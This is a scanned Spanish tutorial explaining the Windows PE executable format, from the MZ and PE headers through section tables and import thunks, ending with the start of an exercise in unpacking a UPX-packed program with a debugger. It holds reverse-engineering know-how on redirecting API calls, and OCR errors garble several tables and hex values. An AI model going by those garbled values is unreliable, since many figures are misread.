0010 ¡Word |SP (Stack Pointer) inicial 


0012 (Word Checksum o 0. Valor de verificación de la suma de las palabras en el ejecutable, usado para 


verificar la validación por posibles datos perdidos. 


0014 ¡Dword ¡CS:IP relativo al inicio del ejecutable (Entry point = Punto de entrada) 
0018 Word Desplazamiento (offset) de la tabla de relocalización. 

40h para los nuevos (NE, LE, LX, W3, PE, etc) ejecutables 
001A [Word ¡Número de traslape (0 = programa principal) 


El primer campo de esta estructura, en el desplazamiento 0000, hay dos caracteres: "MZ", que indican que se trata de un 
archivo ejecutable .EXE. 


Si abrimos con HEX WORKSHOP u otro editor hexadecimal un archivo .EXE de DOS, por ejemplo DEBUG.EXE, 
generalmente ubicado en el directorio CAWINDOWSICOMMAND, veremos en la parte izquierda, en la ventana que 
despliega caracteres en ASCII, que en el desplazamiento 0000 hay dos caracteres: "MZ. Es el número mágico que 
identifica los archivos .EXE. 


A este antiguo encabezado EXE MZ se le han agregado algunos campos que informan al cargador del Sistema Operativo 
(SO) dónde está el encabezado PE con información relevante para W32. 


Encabezado MZ Extendido 


Desplazamiento del nuevo encabezado EXE desde el inicio del archivo o 0 si es un archivo 
003C  [Dword MZ EXE 


El último campo de esta extensión, 'e_Ifanew', indica la dirección donde está la signatura que identifica el formato del 
archivo. Si se trata de un archivo con un programa W32, este campo apunta a dos caracteres: "PE" (Portable Executable), 
el formato elegido por M$ para los archivos con programas W32. 


Si abrimos NOTEPAD.EXE con con HEX WORKSHOP y revisamos el campo e_Ifanew en el desplazamiento 003Ch, 
veremos el número 8000h, que al revés es 0080h, el desplazamiento donde veremos los caracteres 'PE', que identifican el 


formato del archivo (Si trabajas con HEX WORKSHOP, no cierres todavía este archivo). Si ahora abrimos con HEX 
WORKSHOP el archivo WINFILE.EXE, generalmente ubicado en el directorio CAWINDOWS, veremos que el 
desplazamiento 003Ch apunta al desplazamiento 0400h, donde encontramos los caracteres 'NE', que es el formato de los 
archivos W16. 


Inmediatamente después de la signatura hay dos bytes o una palabra (WORD) con ceros, después de los cuales inicia el 
encabezado PE. En la actualidad, el formato NE está practicamente extinguido. Lo pasaré por alto y me concentraré en el 
formato PE. 


Entre el encabezado MZ DOS y la signatura PE, está la seccuón "STUB" del archivo, la cual se incluye para el 
despliegue de un mensaje que indica que el programa sólo puede correr en Windows. 


¿32 BITS?: MÁS CABEZAS 


Dos bytes delante de la signatura se inicia el encabezado PE, cuya estructura es: 


_IMAGE_FILE_HEADER STRUC 

Machine DW ? 

NumberOfSections DW ? ; No. de secciones 

TimeDateStamp DD ? 

PointerToSymbolTable DD ? ; Dir. de la tabla de símbolos 
NumberOfSymbols DD ? ; No. de simbolos 
SizeOfOptionalHeader DW ? ; Tamaño del proximo encabezado 
Characteristics DW ? 

_IMAGE_FILE_HEADER ENDS 


PIMAGE_FILE_HEADER TYPEDEF NEAR PTR _IMAGE_FILE_HEADER 
IMAGE_SIZEOF_FILE_HEADER EQU 20 


Traduzcamos ésta a estructura a una tabla a desplazamientos: 


Encabexado PE 


CPU_TYPE = Tipo de CPU 

0000 - Desconocido 0162 - MIPS I 
0000 [Word 014c - 80386 0163 - MIPS ll 

014d - S0486 0166 - MIPS III 

014e - 80586 


10002 [Word [Número de objetos en la tabla de Objetos 
10004 [Dword Estampa Tiempo 
10008 — [SBytes [Puntero ala tabla de simbolos 
10010 [Word [Tamaño del encabezado siguiente, encabezado opcional NT 


Banderas 
0012 [Word 0 - Imagen del Programa  — 2-EXE 
200 - Dirección fijada 2000 - Librería 


Uno de los campos más importantes de este encabezado es el segundo, en el desplazamiento 0004 desde el inicio del 
encabezado, que indica el número de secciones en el que se divide el ejecutable. Podemos ver en el volcado de 
NOTEPAD.EXE en HEX WORKSHOP, en el desplazamiento 0086h, el valor 0600h, que invertido es O0O06h, el número 
de secciones que hay en el archivo. 


Como dijimos al comienzo, el formato PE divide su contenido en varias secciones con información de tipo específico. El 
campo NumberOfSections indica este número. 


Otro campo que puede ser de utilidad es SizeOfOptionalHeader, que indica el tamaño del encabezado opcional, 
inmediatamente después del encabezado PE. Este valor para NOTEPAD.EXE está en el desplazamiento 94h y es EO00h, 
que invertido es OOEOh=224D, es decir, el encabezado opcional tiene un tamaño de 224 bytes. 


OTRA CABEZA MÁS 


Inmediatamente después inicia el encabezado opcional NT. Randy Katz, en su clásico artículo de 1993, "The Portable 
Executable File Format from Top to Bottom", divide este encabezado opcional en dos partes, una con campos standard y 
otra con campos adicionales: 


_IMAGE_OPTIONAL_HEADER STRUC 

SIA ALI 

; CAMPOS STANDARD 

SILA ALI 

Magic DW ? 

MajorLinkerVersion DB ? 

MinorLinkerVersion DB ? 

SizeOfCode DD ? ; Tamaño del codigo 

SizeOfTnitializedData DD ? ; Tamaño de datos inicializados 
SizeOfUninitializedData DD ? ; Tamaño de datos no inicializados 
AddressOfEntryPoint DD ? ; Dir. virtual del punto de entrada del prog. 
BaseOfCode DD ? ; Dir fisica de la base del cod. 

BaseOfData DD ? ; Dir fisica de los datos 
AAN 

; CAMPOS ADICIONALES NT 
AAA 

ImageBase DD ? ; Dir virtual de la base de la img. 
SectionAlignment DD ?, Alineamiento de secc. 

File Alignment DD ? ; Alinamiento de archivo 
MajorOperatingSystemVersion DW ? 

MinorOperatingS ystemVersion DW ? 

MajorImage Version DW ? 

MinorImageVersion DW ? 

MajorSubsystemVersion DW ? 

MinorSubsystemVersion DW ? 

Reservedl DD ? 

SizeOflmage DD ? ; Espacio reservado en memoria para el archivo 
SizeOfHeaders DD ? ; Tamaño del conjunto de los encabezados 
CheckSum DD ? 


Subsystem DW ? 

DliCharacteristics DW ? 

SizeOfStackReserve DD ? 

SizeOfStackCommit DD ? 

SizeOfHeapReserve DD ? 

Size OfHeapCommit DD ? 

LoaderFlags DD ? 

NumberOfRvaAndSizes DD ? 

DataDirectory_IMAGE_DATA_ DIRECTORY 16 DUP (<> ) ; Tabla de directorios 
_IMAGE OPTIONAL_HEADER ENDS ; de secciones 


PIMAGE_OPTIONAL_HEADER TYPEDEF NEAR PTR _IMAGE_OPTIONAL_HEADER 


A continuación la tabla de desplazamientos equivalentes para esta estructura: 


Encabezado opcional NT 


Campos Estandard 
MO MA RA 
10002 [Word [Versión delenlazador (LINKER) 
10004  [Dword [Tamaño de la sección o segmento de código 
10008  [Dword [Tamaño de la sección de datos inicializados 


0010 Dword Tamaño de la sección de datos no inicializados 
0014 Dreta Dirección virtual del punto de entrada (RVA: Relative Virtual Address) - La 
ejecución comienza aquí. 


10018 [Dword  [Basedela sección de Código 
001C — [Dword  Basedelasección de datos 
Campos Adicionales 
10020 [Dword  Basedela Imagen - inicio de la imagen en la memoria virtual. 
10028  [Dword Alineamiento del Archivo (Potencia de 2 512-64k) 
10032 [Dword Versión requerida de sistema operativo 
MOE A Rea 
10044 — [|Dword [Tamaño dela imagen: espacio reservado en memoria para el archivo. 
10048 Dra ama del naa 
1005C  [Dword ¡Suma de chequeo del archivo 


Subsistema 
005E Word 0 - Desconocido  1- Nativo 
2 - Win GUI 3 - Carácter Win 


0060 Word Banderas DLL 
0064 Dword Memoria reservada para la pila (stack) 


0078 [Dword— trogastas entradas RVA tienen tamaño Dword 


CAMPOS CRÍTICOS DEL ENCABEZADO 


- Tamaño de las secciones - 


Para montar el ejecutable, W32 necesita reservar espacio en memoria. Como hemos adelantado, W32 no divide la 
memoria en segmentos de 64KB como lo hacía DOS sino en secciones de tamaño variable. Los campos SizeOfCode, 
SizeOfTnitializedData y SizeOfUninitializedData, informan el espacio de memoria que el sistema debe reservar para 
cargar cada una de estas secciones. 


Estos valores para NOTEPAD.EXE, tal como puede verse en los desplazamientos 009Ch, OOAO0h y 00A4h, 
respectivamente son 0000 3A00h (tamaño de la sección de código), 0000 4600h (tamaño de la sección de datos 
inicializados) y 0000 0000h (no hay sección de datos no inicializados). 


- Punto de entrada (RVA Entry Point) - 


Otro dato que necesita el sistema para ejecutar el programa en el archivo es el punto de entrada, es decir, la dirección de 
la primera instrucción del programa. Esta información se encuentra en el campo AddressOfEntryPoint, que sigue al 
campo SizeOfUninitializedData del encabezado opcional NT. Para NOTEPAD.EXE este valor, en el desplazamiento 
00A8h, es 0010 0000h, que invertido es 0000 1000h. 


RVA es la abreviatura de Relative Virtual Address, que en español significa Dirección Virtual Relativa. Significa una 
dirección virtual, no real, relativa a la base del archivo. El valor de la base del archivo se encuentra en el campo 
ImageBase (Base de la Imagen). 


- Bases de las secciones - 


Los campos BaseOfCode y BaseOfData indican las direcciones virtuales relativas (RVAs) a la base del archivo de la 
sección de código y de la sección de datos, respectivamente. En NOTEPAD.EXE, estos valores se encuentran en los 
desplazamientos OODACH y O0BOHh y son, respectivamente, 0000 1000h para la sección de código, y 0000 5000h para la 
sección de datos. 


Observa que, para NOTEPAD.EXE, la base del código (BaseOfCode) coincide con el punto de entrada del programa 
(EntryPoint). Quiere decir que el programa inicia en la primera instrucción de la sección de código. 


- Base de la imagen (Image Base) - 


Es la dirección virtual relativa a la base del archivo. Esta información la suministra el campo ImageBase del conjunto de 
campos opcionales del encabezado opcional NT (estructura _IMAGE_OPTIONAL_HEADER). Para NOTEPAD.EXE, 
este valor está en el desplazamiento 00B4h y es 0000 0040, invertido 0040 O0000h. La experiencia dice que este es el 
valor por defecto elegido por los enlazadores como base para los archivos EXE con formato PE. 


Entonces, en el caso de NOTEPAD.EXE, el programa inicia en la dirección virtual Base_de_la_Imagen + 
Punto_de_Entrada: 0040 0000h + 0000 1000h = 0040 1000h. 


Generalmente, 0040 1000h es la dirección virtual de la entrada de los programas en archivos ejecutables con formato PE. 


Esto lo podemos comprobar rápidamente ejecutando NOTEPAD.EXE con el cargador (LOADER) de SICE. Veremos en 
la ventana desplegada por SICE al detenerse en la primera instrucción que el depurador (DEBUGGER) apunta a la 
dirección 00401000h. 


- Alineamientos - 


Para el archivo con formato PE se dan dos alineamientos. El alineamiento de las secciones, campo SectionAlignment, y 
alineamiento de archivo, campo File Alignment. Estos campos son relevantes porque determinan cuanta memoria destina 
el sistema para las secciones y el archivo. 


Los ejecutables W32 no están divididos en segmentos de hasta 64 KB, como en DOS, sino en secciones cuyo tamaño es 
el múltiplo de una página de memoria. El tamaño de una página de memoria es de 4 KB. Si una sección ocupa 8 páginas 
de memoria, su tamaño es de 8*4=32 KB. 


Cada sección del archivo PE es cargada secuencialmente en el espacio de direcciones de un proceso, comenzando en 


ImageBase. El campo SectionAlignment dicta la cantidad mínima de espacio que una sección puede ocupar cuando es 
cargada --es decir, las secciones están alineadas sobre los límtes o fronteras de SectionAlignment. 


El alineamiento de sección no puede ser menor al tamaño de una página (generalmente 4096 bytes en la plataforma x86) 
y debe ser, en todo caso, un múltiplo del tamaño de la página, tal como dicta el manejador de memoria virtual de 
Windows. El enlazador (LINKER) establece un valor de 4096 bytes por defecto, pero esto puede establecerse usando del 
conmutador de enlazador: -ALIGN. 


Por ejemplo, si una sección del programa tiene un tamaño de 1200 bytes, el enlazador asignará a esta sección una página, 
es decir 4096 bytes. Entonces, cuando el programa sea cargado en RAM, el sistema comprometerá una página de 
memoria física para esta sección. 


Para NOTEPAD.EXE, SectionAlignment se encuentra en el desplazamiento OB8h y tiene un valor de 0000 1000h = 
4096 bytes, que es el tamaño de una página. 


El campo File Alignment informa sobre la granularidad mínima de trozos (chunks) de información dentro de la imagen 
antes de ser cargada. Por ejemplo, el enlazador llena con ceros (zero-pads) un cuerpo de sección (datos brutos [raw data] 
para una sección) por encima del límite o frontera más cercana de File Alignment en el archivo. Este valor, 
FileAlignment, está restringido a ser una potencia de 2 entre 512 y 65,535. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (un sector de disco 
tiene un tamaño de 512). 


En NOTEPAD.EXE, FileAlignmentse encuentra en el desplazamiento OBCh y tiene un valor de 0000 0200h = 512 bytes. 
- Tamaño de la imagen - 


Otro campo indispensable es SizeOflmage, ya que para montar el archivo W32 necesita reservar espacio en memoria. 
Esta información se encuentra en el campo SizeOfImage. Este valor no es propiamente el tamaño del ejecutable sino la 
cantidad de espacio que se reserva en el espacio de direcciones para cargar el ejecutable. Este número depende bastante 
del valor SectionAlignment. 


Si un archivo tiene seis secciones, alineadas sobre fronteras de 65,536 bytes, el campo SizeOflmage debería ser 6 * 
65.536 = 393.216 bytes (96 páginas). El mismo archivo enlazado con un alineamiento de sección de 4096 bytes (1 
página) debería dar 6 * 4096 = 24576 bytes (6 páginas) en el campo SizeOfImage. Pero esto sólo es así si todas las 
secciones tienen el mismo tamaño. Puede haber secciones con un tamaño mayor al de una página, lo cual cambia el valor 
de SizeOfImage. 


Podemos calcular SizeOflmage para NOTEPAD.EXE. Tiene 6 secciones y su valor SectionAlignement es 1000h = 4096 
bytes, entonces SizeOflmage debería ser 6 * 1000h = 6000h, sin embargo este no es el caso. 


En NOTEPAD.EXE SizeOfImage está en el desplazamiento OODOh, cuyo contenido es DOCO 0000h, que invertido es 
0000 COOOh. Esto es así porque seguramente hay secciones con un tamaño mayor a una página de memoria. 


- Directorio de Datos - 


Al final del encabezado opcional hay un directorio, que ocupa el campo DataDirectory. Se trata de un vector o arreglo 
(array) que guarda las direcciones donde se encuentran las tablas de datos de las secciones del archivo. Cada una de estas 
entradas tiene un tamaño de 8 bytes y se divide en dos campos. El primero indica la dirección virtual relativa a la base 
donde se encuentra la tabla con datos acerca de alguna sección. El otro campo dice el tamaño de la tabla. Cada entrada de 
este directorio tendría entonces la siguiente estructura: 


_IMAGE DATA DIRECTORY STRUC 

VirtualAddress DD ? ; Dirección virtual donde está la tabla 
Size DD ? ; Tamaño de la tabla 
_IMAGE_ DATA DIRECTORY ENDS 


PIMAGE_DATA_DIRECTOR Y TYPEDEF NEAR PTR _IMAGE_DATA_DIRECTORY 


El número de entradas del directorio está indicado en el campo NumberOfRvaAndSizes del encabezado opcional. 
Generalmente este valor es 0000 0010h=16D. El tamaño del directorio de datos sería el valor igual al número de entradas 
por ocho bytes de cada entrada. En este caso es 128 bytes. En NOTEPAD.EXE este valor está en el desplazamiento 
00F4h y contiene 1000 0000, que invertido es 0000 0010h = 16d, es decir, 16 entradas en el directorio de datos. 


De acuerdo al archivo WINNT. H, las siguientes son las entradas del direcorio de datos. 


; Números correspondientes a las entradas del directorio de datos 


IMAGE_DIRECTORY_ENTRY_EXPORT EQU 0 
IMAGE_DIRECTORY_ENTRY_IMPORT EQU 1 
IMAGE_DIRECTORY_ENTRY_RESOURCE EQU 2 
IMAGE_DIRECTORY_ENTRY_EXCEPTION EQU 3 
IMAGE_DIRECTORY_ENTRY_SECURITY EQU 4 
IMAGE_DIRECTORY_ENTRY_BASERELOC EQU 5 
IMAGE_DIRECTORY_ENTRY_DEBUG EQU 6 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT EQU 7 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR EQU 8 
IMAGE_DIRECTORY_ENTRY_TLS EQU 9 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG EQU 10 


El número que se asigna a cada entrada de directorio de datos se emplea para facilitar las rutinas de búsqueda de 
información sobre las secciones. 


VERIFIQUEMOS 


Ahora cerremos HEX WORKSHOP. Tomemos nota de los valores que hemos encontrado. Abramos NOTEPAD.EXE en 
EXESCOPE o en PROCDUMP y comparemos los valores desplegados con los que hemos obtenido hasta ahora. Para 
esta evaluación es mejor usar EXESCOPE ya que muestra el nombre de los encabezados y los desplazamientos donde 
están los datos. 


Comparemos entonces... Nada mal ¿cierto? 


Este proceso de ubicación manual, que puede ser tan engorroso hacerlo de esta manera, lo realiza el cargador de 
Windows de una manera muy rápida y automática. También es el mismo proceso seguido por los volcadores y editores 
de encabezados de archivos PE. 


MÁS CABEZAS ¡HASTA CUÁNDO! 


La información sobre las secciones del archivo PE se encuentra en las tablas de secciones, después del encabezado 
opcional están, ordenadas secuencialmente. Cada una de estas tablas tiene la siguiente estructura: 


_IMAGE_SECTION_HEADER STRUC 

Name DB 8 DUP ( ? ) ; Cadena con el nombre de la sección 
3 

; Misc 

3 

tag$0 <> 

VirtualAddress DD ? 

Size OfRawData DD ? 

PointerToRawData DD ? 

PointerToRelocations DD ? 


PointerToLinenumbers DD ? 
NumberOfRelocations DW ? 
NumberOfLinenumbers DW ? 
Characteristics DD ? 

_IMAGE _SECTION_HEADER ENDS 


PIMAGE_SECTION_HEADER TYPEDEF NEAR PTR _IMAGE_SECTION_HEADER 


tag$0 UNION 
PhysicalAddress DD ? 
VirtualSize DD ? 
tag$0 ENDS 


Espero que ya no se necesite presentar esta estructura con una tabla de desplazamientos. 


El primer campo de la tabla es una arreglo (array) de 8 bytes de largo donde se escribe una cadena de caracteres con el 
nombre de la sección. Sigue una unión con el tamaño virtual de la sección. Luego el campo VirtualAddress es la 
dirección virtual relativa a la base de la imagen donde se encuentra la sección. 


Size OfRawData es el tamaño del FileAlignment relativo al cuerpo de la sección. El tamaño actual del cuerpo de la 
sección será menor o igual al múltiplo de FileAlignment. Una vez que la imagen es cargada dentro del espacio de 
direcciones de un proceso, el tamaño del cuerpo de la sección llega a ser menor o igual a un multiplo de 


SectionAlignment. PROCDUMP despliega este campo bajo el nombre "RAW DATA". 


PointerToRawData es el desplazamiento a la localización del cuerpo de la sección en el archivo. PROCDUMP llama a 
este campo "RAW OFFSET". 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos inicializados 
o no inicializados, si se puede escribir y leer sobre la sección, si es 

ejecutable, si es compartible, etc. PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las 
equivalencias: 


- 0OOO0000020h __Código. 

- 0O00000040h __Datos inicializados. 

- 0OO0000080h __Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __Sección paginable. 

- 100000000h __ Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 
2. se pueden leer datos 40000000h 


3. se pueden compartir datos 10000000h 
4. hay código 00000020h 


E0000020h 
Se trata de una sección con código ejecutable. Esta comúnmente lleva como nombre .text. 
Hay una tabla de estas para cada sección. NOTEPAD.EXE tiene seis secciones, por lo que tiene seis tablas de secciones. 
Abramos de nuevo NOTEPAD.EXE con el editor hexadecimal. 


En NOTEPAD.EXE la primera tabla se encuentra en el desplazamiento 0178h. Visualmente es simple ubicarla con el 
editor hexadecimal ya que cada tabla se inicia con el campo Name, que es un campo de ocho bytes con una cadena de 
caracteres ASCH con el nombre de la sección. El nombre de la primera sección en NOTEPAD.EXE es .text. Es el 
nombre que por defecto se asigna a la sección con código ejecutable. 


Hay varias secciones predefinidas, cuyos nombres son: 


- Sección de código ejecutable: .text 

- Secciones de datos: .bss, .rdata, .data 

- Sección de recursos: .rsrc 

- Sección de datos exportados: .edata 

- Sección de datos importados: .idata 

- Sección de información para depuración: .debug 


"Export" contiene información sobre los nombres que exporta el programa y pueden ser solicitados y usados por otros 
procesos. 


"Import" indica las funciones que el programa solicita a otros; generalmente son funciones que se encuentran en las DLL 
del sistema, donde se encuentran las funciones de la API de Windows, que son incluidas en los prototipos que definen las 
funciones empleadas en el programa. 


"Resources" contiene información sobre los recursos que contiene el programa: menúes, diálogos, iconos, bitmaps, 
cadenas de texto, etc. 


"Debug" es la sección donde el enlazador, si así lo quizo el programador, guarda información para facilitar la depuración 
del programa, con un depurador (debugger). 


El siguiente campo de una entrada del directorio de datos, después del nombre, es una unión con el tamaño de la sección. 
La dirección virtual donde se encuentra la sección está en el campo VirtualAddress. La dirección física de la sección está 
en PointerToRawData. 


TABLAS DE DATOS 


Cada sección tiene una tabla, generalmente al comienzo, con información particular sobre ella. 


Para localizar una tabla de éstas, se determina su dirección virtual relativa (RVA: RELATIVA VIRTUAL ADDRESS). 


Este valor está en el primer campo de la entrada correspondiente en el directorio de datos. Luego se usa esta dirección 
virtual para determinar en cuál sección está. 


La dirección física de la sección nos la dá el campo PointerToRawData de la tabla de sección. La tabla de datos de la 
sección está en un desplazamiento igual al dato en el campo VirtualAddress en la entrada del directorio de datos, al final 
del encabezado opcional, menos el dato del campo VirtualAddress en la tabla de sección correspondiente. Este 
desplazamiento es relativo a la dirección en el campo PointerToRawData. 


Como vimos, las tablas de secciones se encuentran inmediatamente después del directorio de datos, es decir después del 
encabezado opcional. 


Con la dirección física del desplazamiento a la primera tabla de las secciones de la imagen, con el número de secciones 
de la imagen (en el campo NumberOfSection del encabezado PE, la RVA donde inicia la sección, la RVA de la tabla de 
datos de la sección y el puntero a los datos brutos de 

la sección PointerToRawData, puedo localizar donde se hallan los datos que conforman la tabla de datos de una sección. 


Como ilustración localicemos la tabla de la sección de nombres importados .idata en NOTEPAD.EXE. 


Primero buscamos en el directorio de datos la entrada que corresponde a .idata. Es la entrada número 1, es decir, la 
segunda porque la primera es la número O (véase los números correspondientes a las entradas del directorio de datos). En 


NOTEPAD.EXE localizamos esta entrada en el desplazamiento 0100h, que inicia con el campo Virtual Address de la 
entrada del directorio que dice la dirección virtual donde se ubica la tabla de datos de la sección .idata. El valor es 0070 
0000, que invertido es 0000 7000h. 


Luego localizamos el segundo campo de la tabla de sección correspondiente a .idata. Este campo se llama también 
VirtualAddress e indica la dirección virtual donde inicia la sección. Para encontrarlo manualmente, buscamos la cadena 
".idata"; la tabla de sección correspondiente a esta sección inicia en el deplazamiento donde hallamos esa cadena. Este 
campo se ubica, en NOTEPAD.EXE, en O1FO0. El campo Virtual Addres de esta sección estará entonces en O1FC, ya 
que el primer campo, donde está la cadena con el nombre, tiene 8 bytes y el siguiente campo, con el tamaño de la 
sección, tiene 4 bytes. El valor en O1FC es 0000 7000h. Quiere decir que la tabla de datos de la sección se encuentra en 
el inicio de ésta. 


Ya que hemos localizado la tabla de seccción, obtenemos el valor del campo PointerToRawData. Este campo lo 
ubicamos en 0204, y contiene 0042 0000, que invertido es 0000 4200h. Es el desplazamiento del archivo donde están los 
datos brutos de la sección. 


Con estos datos ya podemos localizar la tabla de datos de la sección .idata en NOTEPAD.EXE. Resto la dirección virtual 
de la sección (campo VirtualAddress de la tabla de sección) a la dirección de la tabla de datos de esa sección (campo 
VirtualAddress en el directorio de datos). En este caso, la diferencia es cero: la tabla de datos está al inicio de la sección. 
A la diferencia obtenida le sumo el valor del campo PointerToRawData y obtengo el desplazamiento donde se encuentra 
la tabla de datos de la sección .idata. Como la dirección virtual de la sección coincide con la dirección de su tabla de 
datos, el desplazamiento dentro del archivo, donde se encuentra la tabla de datos de la sección .idata, coincide el valor en 
PointerToRawData: 4200h. 


Puede parecer un proceso muy complejo. Pero basta imaginar lo que significaría que el cargador del SO tuviera que 
buscar de manera secuencial en un ejecutable de 3.2 MB, por ejemplo, qué funciones el programa importa de las librerías 
DLL del sistema. 


Bien, ahora que hemos localizado la tabla de datos de la sección, podemos buscar en ella los nombres importados. 


La tabla de datos de la sección de datos importados tiene también una estructura de directorio, es decir, es una tabla con 


varias entradas con la misma estructura cada una. Por este motivo podemos llamar a esta tabla Directorio de Datos 
Importados, cuyas entradas tienen la siguiente estructura, que llamamos IMAGE_IMPORT_DESCRIPTOR: 


IMAGE_IMPORT_DESCRIPTOR struc 
dwRVAFunctionNameList DWORD ? ; 
TimeDateStamp DWORD ?; 
ForwarderChain DWORD ?; 
dwRVAModuleName DWORD ?; 
dwRVAFunctionAddressList DWORD ?2; 
IMAGE _IMPORT_DESCRIPTOR ends 


PIMAGE_IMAGE_IMPORT_DESCRIPTOR TYPEDEF PTRIMAGE_IMPORT_DESCRIPTOR 


Hay tantas entradas de este tipo como módulos importados sean importados. Es decir, hay una entrada ImportDirectory 
para cada módulo importado. 


El primer campo, dwRVAFunctionNameList, apunta a un arreglo (array) de punteros a estructuras llamadsa 
IMAGE_IMPORT_BY_NAME, que son las listas con los nombres y ordinales de las funciones a usar del módulo 
importado. 


TimeDateStamp indica cuando el archivo fue fabricado. 


Uno de los campos importantes de esta estructura es dwRV AModuleName, una dirección virtual relativa a la base que 
apunta al nombre del módulo importado. 


Si resto al valor de dwRV AModuleName la dirección virtual de la sección, obtengo el desplazamiento desde el inicio de 
la sección. 


En NOTEPAD.EXE, el campo dwRV AModuleName está en el desplazamiento 4200h + 4 + 4 + 4 = 420Ch, y contiene 
E874 0000, que invertido es 0000 74E8h. La dirección virtual de la sección .idata es 7000h. Entonces el nombre del 
primer módulo importado se encuentra en: 


0000 74E8h - 0000 70000h = 0000 04E8h + 0000 4200h = 0000 46E8h. 


En el desplazamiento 46E8h encuentro una cadena con el primer módulo importado por NOTEPAD.EXE: Shel132.dll. 
Este nombre estará antecedido por el nombre de una de las funciones importadas del módulo y estará seguido por las 
demás funciones. 


El campo dwRVAFunctionNameList apunta a la lista de punteros a los nombres de las funciones importadas en el 
módulo. Confirmemos esto en NOTEPAD.EXE. 


El campo dwRVAFunctionNameList está en 4200h y contiene 0000 7160h, lo que indica que la lista de punteros a 
nombres importados del módulo correspondiente está en: 


0000 7160h - 0000 70000h = 0000 0160h + 4200h = 0000 4360h. 


El valor en este desplazamiento es 000 74D8. Es la dirección virtual de la lista de nombres: 


0000 74D8 - 0000 7000 = 0000 04D8h + 4200h = 0000 46D8h. 


Si vamos a esta dirección encontraremos que contiene el número 004Eh, seguido por la cadena 'ShellExecuteA"'. El 
primer número es el ordinal de exportación de la función con que inicia la lista de nombres importados del módulo, y la 
cadena es el nombre de la función. El ordinal es un número de referencia que puedo emplear para llamar a la función 
importada si no poseo su nombre. 


El campo dwRVAFunctionAddressList es sumamente importante. Apunta también a un arreglo (array) donde el cargador 
de W32 coloca la dirección virtual del punto de entrada de la función importada. Esto es de sumo interés: cuando el 
cargador monta el programa en RAM llena este arreglo con las direcciones virtuales donde inician las funciones 
importadas. Cuando el programa llama a una de estas funciones lo hace indirectamente a través de una llamada como 
esta: 


¡mp [RVA del THUNK] 


El campo dwRVAFunctionAddressList está, en NOTEPAD, en 0000 4210h, y contiene el valor 0000 7370h, ya 
invertido. Quiere decir que apunta a: 


7370 - 7000 = 0370 + 4200 = 4570h : <-- dwRVAFunctionAddressList 
Anota este número. 
Ahora fíjate. Desensambla NOTEPAD.EXE con W32DASM. Busca la cadena "ShellExecuteA" hasta llegar a: 


* Reference To: SHELL32.ShellExecuteA, Ord:004Eh | 
:00402DEE FF1570734000 Call dword ptr [00407370] 


Es una típica llamada a una función API de W32. Tiene la forma "CALL DWORD PTR [THUNK RVA]. "THUNK 
RVA" es la RVA donde el cargador de W32 coloca la dirección virtual donde inicia la función importada en el espacio 
de direcciones del proceso. Si con un programa como OFFSET (de Ieczelion) o OFFCAL (de MrCrimson) revisas el 
desplazamiento en el archivo que corresponde a la dirección de memoria 00407370, verás que esta dirección corresponde 
al desplazamiento 000 4570h, el mismo apuntado por el campo dwRVAFunctionAddressList correspondiente a la 


información sobre "ShellExecuteA”. 


No olvides esto último, porque es muy útil para redirigir los llamados a funciones de la API de W32. 


Tenemos ya una idea de como se estructura el encabezado significado de sus campos. Todavía queda analizar otras 
importantes secciones predefinidas, como la sección de recursos .rcrs. Es una de las secciones más atractivas de los 
archivos PE. Debido a la complejidad de su estructura, prefiero diferir por ahora su análisis, ya que implica un concepto 
fundamental para el programador: árbol de búsqueda. Se trata de un concepto de datos estructurados que merecería una 
atención especial. 


De todos modos hagamos un ejercicio para consolidar conocimientos. 


Os 
Vi 


Al Atake 


DESEMPAQUETANDO EJECUTABLES 


Como ejercicio podemos tomar cualquier archivo ejecutable y examinar el encabezado con un editor hexadecimal, anotar 
los valores críticos y después comprobar si hemos acertado con cualquier volcador (dumper) de archivos PE, como 
EXESCOPE o PROCDUMP. 


Empleemos PROCDUMP y tomemos como víctima SNIPPETCREATOR de Iczelion. 

Se trata de un fabuloso programa ideado por un experto en W32 ASM. Además de permitir editar los encabezados de los 
archivos PE, sirve para insertar SNIPPETS (recortes) en archivos PE. En otras palabras, este programa permite insertar 
código en ejecutables, no sólo cambiar unos cuantos bytes, sino rutinas enteras. 


Para ver un poco la importancia de conocer los encabezados PE, este programa resulta ejemplar. Veamos. 


Supongamos que queremos hacer una lista muerta de SNIPPETCREATOR. Lo abrimos con WDASM232 8.9 o con IDA. 
¡Qué extraño!. No vemos llamado a ninguna APT W32. 


Carguemos el programa con SICE ¡Cáspita!, ¿qué pasa...?. No se despliega el programa en la ventana de SICE. Se abre 
directamente. 


Ahora despleguemos SICE (ctrl+D). Instalemos un BRKP: BPX GetModuleHandleA. Ahora ES y volvemos a Win. 
Iniciemos SNIPPETCREATOR. ¡Ahora sí! Se despliega SICE. Tecleamos F11 y ya estamos en SNIPPETCREATOR. 
Hacemos alt+C y bajamos por la ventana de código. Ahora si encontramos un montón de llamadas a APIs W32. Esto no 
se entiende. ¿De dónde salieron estas 

llamadas que no aparecieron en la lista muerta? 


Tal vez si hacemos un volcado con un editor de archivos PE, como PROCDUMP, podamos encontrar alguna orientación. 
Abramos SNIPPETCREATOR con el editor de PROCDUMP. 


¿Qué vemos en la ventana PE Structure Editor? El campo "Entry Point" (punto de entrada) tiene el valor 00018037h. 
Qué rareza. Generalmente este valor es 00001000h para los ejecutables PE. 


Veamos ahora el editor de estructuras (Struct Editor): pulsemos el botón "Sections". Caramba: ninguna sección del 
archivo lleva nombre predefinido. Los nombres que encontramos son: UPX0O, UPX1 y UPX3. El archivo tiene tres 
secciones con nombres no predefinidos. 


Ahora resumamos las observaciones: 

1. Encontramos diferencias entre la lista muerta generada por WDASM y el despliegue en memoria que nos presenta 
SICE. 

2. El punto de entrada del programa no es el convencional. 

3. Las secciones no tienen nombres predefinidos. 

4. El programa no es desplegado inmediatamente en SICE con el LOADER 


